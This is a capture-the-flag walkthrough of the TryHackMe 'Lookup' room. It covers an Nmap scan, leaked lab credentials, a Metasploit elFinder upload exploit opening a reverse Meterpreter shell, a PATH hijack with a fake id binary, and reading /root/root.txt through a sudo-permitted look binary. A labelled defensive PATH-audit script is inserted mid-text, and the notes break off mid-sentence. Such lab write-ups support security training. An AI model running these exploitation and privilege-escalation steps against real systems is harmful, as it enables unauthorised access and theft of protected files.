Tryhackme Lookup Walkthrough - Pentest Lab Notes

TryHackMe - Lookup Room Walkthrough

Welcome to the walkthrough for the Lookup room on TryHackMe. This challenge involves web enumeration, file upload exploitation, reverse shell access, and privilege escalation using Linux misconfigurations.

📌 Room Details

  • Platform: TryHackMe
  • Room: Lookup
  • Difficulty: Easy–Intermediate
  • Focus: Web exploitation, file upload, reverse shell, privilege escalation

1. Nmap Enumeration

nmap -A -F -oN nmap.txt 10.10.83.34

Open Ports

22/tcp - SSH (OpenSSH 8.2p1 Ubuntu)

80/tcp - HTTP (Apache 2.4.41)

2. Web Enumeration

Web interface presents a login form.

Valid credentials found:

    admin : --------

    jose : password123

Application running: elFinder file manager

3. Exploit: File Upload (elFinder + Metasploit)

msfconsole
use exploit/unix/webapp/elfinder_php_upload_exec
set RHOSTS files.lookup.thm
set LHOST tun0
set LPORT 9999
run

🎯 Meterpreter shell received as user: www-data

4. Shell Upgrade

To upgrade to an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

5. PATH Hijack via Fake id Binary

Create a fake id script in /tmp and put /tmp at the front of PATH, so the shell finds it before the real binary:

echo -e '#!/bin/bash\necho "uid=33(think) gid=33(www-data) groups=33(www-data)"' > /tmp/id
chmod +x /tmp/id
export PATH=/tmp:$PATH

Verify hijack:

id
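
A defensive counterpart to the step above, as an added example that is not part of the original walkthrough: a POSIX shell check that reports which file a command name resolves to under a given PATH and flags any that land outside a trusted set of system directories. The trusted directory list and the function names are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag commands whose PATH lookup
# lands outside trusted system directories, as with the fake /tmp/id above.

# Assumption: this trusted set is illustrative; adjust it to the host's policy.
is_trusted_dir() {
    case "$1" in
        /usr/local/sbin|/usr/local/bin|/usr/sbin|/usr/bin|/sbin|/bin) return 0 ;;
        *) return 1 ;;
    esac
}

# resolve_in_path PATH_STRING CMD
# Print the first executable file named CMD, searching PATH_STRING in order.
# The ( ) body is a subshell, so IFS and set -f do not leak to the caller.
resolve_in_path() (
    IFS=:
    set -f
    for dir in $1; do
        [ -n "$dir" ] || dir=.      # an empty PATH entry means the current directory
        if [ -f "$dir/$2" ] && [ -x "$dir/$2" ]; then
            printf '%s\n' "$dir/$2"
            exit 0
        fi
    done
    exit 1
)

# audit_path PATH_STRING CMD...
# Print "CMD<TAB>FILE" for each command that resolves outside the trusted set.
# Returns 1 if at least one such command was found, 0 otherwise.
audit_path() {
    ap_path=$1; shift
    ap_found=0
    for ap_cmd in "$@"; do
        ap_hit=$(resolve_in_path "$ap_path" "$ap_cmd") || continue   # not installed
        is_trusted_dir "${ap_hit%/*}" && continue
        printf '%s\t%s\n' "$ap_cmd" "$ap_hit"
        ap_found=1
    done
    return "$ap_found"
}

# Audit the current session for the commands this walkthrough relies on.
audit_path "$PATH" id su sudo look ||
    echo "PATH resolves the commands above outside trusted directories" >&2
```

Privileged scripts and programs avoid this class of problem by calling binaries by absolute path (for example /usr/bin/id) or by setting PATH explicitly before running anything.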

6. Lateral Movement - Switch to think

su think
Password: ----------------

✔️ Switched to user think

7. Privilege Escalation Using look

Check sudo privileges:

sudo -l

Output:

(ALL) NOPASSWD: /usr/bin/look

Abuse the look command to read the root and user flags:

sudo /usr/bin/look '' /root/root.txt  

Flags

User Flag: Found in /home/think/user.txt
Root Flag: Found in /root/root.txt

✅ Summary

| Phase | Technique |
| --- | --- |
| Initial Access | Metasploit – elFinder Upload Exploit |
| Shell Upgrade | pty.spawn() |
| User Enumeration | PATH hijack via fake id |
| Lateral Movement | su think using password from output |
| Privilege Escalation | sudo /usr/bin/look to read root flag |

🧠 Key Takeaways

Always run sudo -l as soon as you escalate to a new user.

PATH hijacking can allow you
This post is licensed under CC BY 4.0 by the author.